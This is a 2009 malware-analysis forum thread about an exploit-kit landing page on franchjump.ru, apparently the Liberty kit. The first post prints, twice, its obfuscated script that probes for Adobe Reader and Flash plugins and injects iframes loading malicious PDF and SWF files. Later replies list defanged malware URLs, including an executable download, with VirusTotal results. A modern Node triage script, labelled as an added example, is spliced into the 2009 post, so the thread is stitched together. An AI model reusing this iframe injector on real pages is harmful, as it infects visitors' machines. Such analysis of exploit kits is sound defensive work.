Malware Domain List

Malware Related => Malware Analysis => Topic started by: cleanmx on August 27, 2009, 06:44:47 pm

Title: pdf swf exploit in iframe
Post by: cleanmx on August 27, 2009, 06:44:47 pm
No luck decoding this with Malzilla...

Code:
http://franchjump.ru/lib/index.php
leads to:
Code:
<html><head></head><body><script>function qVkMn73vX(qVkMn73vX){return true;}var x0RUJqGCTF = new Array("PDF.PdfCtrl",
"AcroPDF.PDF", "ShockwaveFlash.ShockwaveFlash", "Adobe Acrobat", "Adobe PDF", "Flash");this.lpZBwtxYaW=13553;function
b7vOGuKPk(rhodih6xR){var lSQBVtKKX=false;var njJadnyF2 = document.createElement("iframe");var
vGTSfY3ftC='vGTSfY3ftC';njJadnyF2.setAttribute("src", rhodih6xR);var
ra2KsGcQ3="ra2KsGcQ3";njJadnyF2.setAttribute("width", 200);var fTdFvA65k=1511;njJadnyF2.setAttribute("height",
200);this.cE7Uzbow='cE7Uzbow';document.body.appendChild(njJadnyF2);this.f1ZyDcfNJ=16427;}this.lFGmhMmt9=false;if(navigator.userAgent.indexOf("MSIE")
!= -1){this.lFGmhMmt9=false;for(mMb5G2BC = 0; mMb5G2BC < 3; mMb5G2BC ++){try{mzF1gvC6I = new
ActiveXObject(x0RUJqGCTF[mMb5G2BC]);function wEmSDxNQh(){}if(mzF1gvC6I){function iw2iiIFYF(iw2iiIFYF){return
true;}switch(mMb5G2BC){case 0:case 1:b7vOGuKPk("belowTendSome.pdf");break;case 2:b7vOGuKPk("evilSOr.swf");break;}var
wLGLEXnXZ=27351;}else{var sEZtIAB6M="sEZtIAB6M";}}catch(e){ function sHpNQCBS6(sHpNQCBS6){return sHpNQCBS6;}
}}}else{this.tHPi7ocW4="tHPi7ocW4";for(w594UW3fa = 0; w594UW3fa <= navigator.plugins.length; w594UW3fa++){var a1VPNeZNR
= navigator.plugins[w594UW3fa].name;if((a1VPNeZNR.indexOf(x0RUJqGCTF[3]) != -1 || a1VPNeZNR.indexOf(x0RUJqGCTF[4]) !=
-1)) b7vOGuKPk("belowTendSome.pdf");if( a1VPNeZNR.indexOf(x0RUJqGCTF[5]) != -1 ) b7vOGuKPk("evilSOr.swf");}function
wJwuFMJm(wJwuFMJm){return true;}}this.rsmpJInjI='rsmpJInjI';var hhNE48RIR="hhNE48RIR";var
jPyi2a1aR="jPyi2a1aR";</script></body></html>
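As an added example that is not part of the thread: the posted script is a plugin-probing iframe injector. It lists Adobe Reader / Flash ProgIDs, probes them via ActiveXObject on IE and via navigator.plugins elsewhere, and calls one helper (b7vOGuKPk) that builds a 200x200 iframe pointing at a PDF or SWF. The Node script below does a purely static triage of such samples without evaluating them: it pulls out the string literals, identifies the helper that creates an iframe and sets its src from a parameter, and collects the literal file names passed to it. The regexes and the KNOWN_PROBES list are this example's own assumptions, tuned to the shape of the sample above; the embedded SAMPLE is the script from the first post.

```javascript
// Static triage of a plugin-probing iframe injector (added example; not code from
// the original post). Nothing here executes the sample, it is only pattern-matched.

// Sample input: the obfuscated script quoted in the first post, embedded verbatim.
const SAMPLE = `<html><head></head><body><script>function qVkMn73vX(qVkMn73vX){return true;}var x0RUJqGCTF = new Array("PDF.PdfCtrl",
"AcroPDF.PDF", "ShockwaveFlash.ShockwaveFlash", "Adobe Acrobat", "Adobe PDF", "Flash");this.lpZBwtxYaW=13553;function
b7vOGuKPk(rhodih6xR){var lSQBVtKKX=false;var njJadnyF2 = document.createElement("iframe");var
vGTSfY3ftC='vGTSfY3ftC';njJadnyF2.setAttribute("src", rhodih6xR);var
ra2KsGcQ3="ra2KsGcQ3";njJadnyF2.setAttribute("width", 200);var fTdFvA65k=1511;njJadnyF2.setAttribute("height",
200);this.cE7Uzbow='cE7Uzbow';document.body.appendChild(njJadnyF2);this.f1ZyDcfNJ=16427;}this.lFGmhMmt9=false;if(navigator.userAgent.indexOf("MSIE")
!= -1){this.lFGmhMmt9=false;for(mMb5G2BC = 0; mMb5G2BC < 3; mMb5G2BC ++){try{mzF1gvC6I = new
ActiveXObject(x0RUJqGCTF[mMb5G2BC]);function wEmSDxNQh(){}if(mzF1gvC6I){function iw2iiIFYF(iw2iiIFYF){return
true;}switch(mMb5G2BC){case 0:case 1:b7vOGuKPk("belowTendSome.pdf");break;case 2:b7vOGuKPk("evilSOr.swf");break;}var
wLGLEXnXZ=27351;}else{var sEZtIAB6M="sEZtIAB6M";}}catch(e){ function sHpNQCBS6(sHpNQCBS6){return sHpNQCBS6;}
}}}else{this.tHPi7ocW4="tHPi7ocW4";for(w594UW3fa = 0; w594UW3fa <= navigator.plugins.length; w594UW3fa++){var a1VPNeZNR
= navigator.plugins[w594UW3fa].name;if((a1VPNeZNR.indexOf(x0RUJqGCTF[3]) != -1 || a1VPNeZNR.indexOf(x0RUJqGCTF[4]) !=
-1)) b7vOGuKPk("belowTendSome.pdf");if( a1VPNeZNR.indexOf(x0RUJqGCTF[5]) != -1 ) b7vOGuKPk("evilSOr.swf");}function
wJwuFMJm(wJwuFMJm){return true;}}this.rsmpJInjI='rsmpJInjI';var hhNE48RIR="hhNE48RIR";var
jPyi2a1aR="jPyi2a1aR";</script></body></html>`;

// Plugin / ActiveX identifiers worth flagging. Assumption: only the names that
// appear in the posted sample are listed; a real triage list would be longer.
const KNOWN_PROBES = new Set([
  "PDF.PdfCtrl", "AcroPDF.PDF", "ShockwaveFlash.ShockwaveFlash",
  "Adobe Acrobat", "Adobe PDF", "Flash",
]);

// All double- or single-quoted string literals, in source order.
function stringLiterals(src) {
  const out = [];
  const re = /"([^"\\]*)"|'([^'\\]*)'/g;
  let m;
  while ((m = re.exec(src)) !== null) out.push(m[1] !== undefined ? m[1] : m[2]);
  return out;
}

// Names of one-parameter functions whose body creates an <iframe> and sets its
// src from that parameter, i.e. the injector helper (b7vOGuKPk in the sample).
function iframeLoaderNames(src) {
  const names = [];
  const re = /function\s+(\w+)\s*\((\w+)\)\s*\{([^}]*)\}/g;
  let m;
  while ((m = re.exec(src)) !== null) {
    const [, name, param, body] = m;
    const setsSrc = new RegExp(`setAttribute\\(\\s*["']src["']\\s*,\\s*${param}\\s*\\)`);
    if (/createElement\(\s*["']iframe["']\s*\)/.test(body) && setsSrc.test(body)) {
      names.push(name);
    }
  }
  return names;
}

// Literal arguments passed to the loader(s): the files the page would try to load.
function loaderTargets(src, loaders) {
  const targets = new Set();
  for (const name of loaders) {
    const re = new RegExp(`\\b${name}\\(\\s*["']([^"']+)["']\\s*\\)`, "g");
    let m;
    while ((m = re.exec(src)) !== null) targets.add(m[1]);
  }
  return [...targets].sort();
}

// Summary a defender can act on: what is probed, how, and what gets loaded.
function triage(src) {
  const loaders = iframeLoaderNames(src);
  return {
    probes: stringLiterals(src).filter((s) => KNOWN_PROBES.has(s)),
    usesActiveX: /new\s+ActiveXObject\s*\(/.test(src),
    enumeratesPlugins: /navigator\.plugins/.test(src),
    loaders,
    payloads: loaderTargets(src, loaders),
  };
}

console.log(JSON.stringify(triage(SAMPLE), null, 2));
```

For this sample the summary lists the six probed plugin names, both probing paths (ActiveXObject and navigator.plugins), the single injector helper and the two payload names belowTendSome.pdf and evilSOr.swf, which is exactly the set of files to pull from the host for further analysis. The matching is deliberately structural (iframe creation plus src assignment from a parameter) rather than tied to the randomised identifiers, so it survives the per-visit renaming these kits do.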
Title: Re: pdf swf exploit in iframe
Post by: MysteryFCM on August 27, 2009, 07:01:02 pm
Full source code for it attached (above is only partial code)
Title: Re: pdf swf exploit in iframe
Post by: RS-232 on August 27, 2009, 11:42:32 pm
hxxp://franchjump.ru/lib/update.php?id=2
Result: 10/41 (24.4%)
http://www.virustotal.com/analisis/d35dbb8eb7cc043ccb7f92aabe8886785ad35adb54cc8c139bdee00ab8d89c50-1251416118

hxxp://franchjump.ru/lib/webThere.png
Result: 5/41 (12.2%)
http://www.virustotal.com/analisis/669db4a1fa13693720475125509f752fddc1c347eed7959dbbb74de6d4bb8785-1251416942

hxxp://franchjump.ru/lib/belowTendSome.pdf
Result: 6/41 (14.64%)
http://www.virustotal.com/analisis/5434abe05a5ae1114754176e7297839e96d2b9ebe8082e28c31a3d2944e1cbe5-1251415971

hxxp://franchjump.ru/lib/evilSOr.swf
Result: 2/41 (4.88%)
http://www.virustotal.com/analisis/640e72c3753dd90322fbb26728d44011e0041824ede84419474f19b5227b38b9-1251390004

This crap is UCS2 with a twist... now if only I was slightly better in regexp, but anyway...
a bit of google-fu revealed how to go about de-obfuscating this lameness:  :)
http://www.web2secure.com/2009/08/complex-obfuscated-js-code-in-pdf.html

Semi-decoded js crap in attachment below - nice ip address by the way, full of crappy domains...
http://www.bfk.de/bfk_dnslogger.html?query=211.95.78.98#result
Title: Re: pdf swf exploit in iframe
Post by: RS-232 on August 28, 2009, 11:51:57 am
From the same ip (and not already spotted in the list, as most of the aforementioned domains are)...

hxxp://uploadfilefree.ru/cc.exe
Result: 2/41 (4.88%):
http://www.virustotal.com/analisis/42fdb8be709abed7a12a8c76e9e4ff5b85a54c659862c59a25b2f09baebef0df-1251460092
Title: Re: pdf swf exploit in iframe
Post by: WIEx on August 28, 2009, 12:13:37 pm
this is a Liberty Exploit
Title: Re: pdf swf exploit in iframe
Post by: RS-232 on August 28, 2009, 12:20:23 pm
Quote
this is a Liberty Exploit
...nothing really special in it in my personal view (at least when compared to the rest of exploit packs),
except maybe from the Exploit.JS.DirektShow in the 'webThere.png' mentioned above...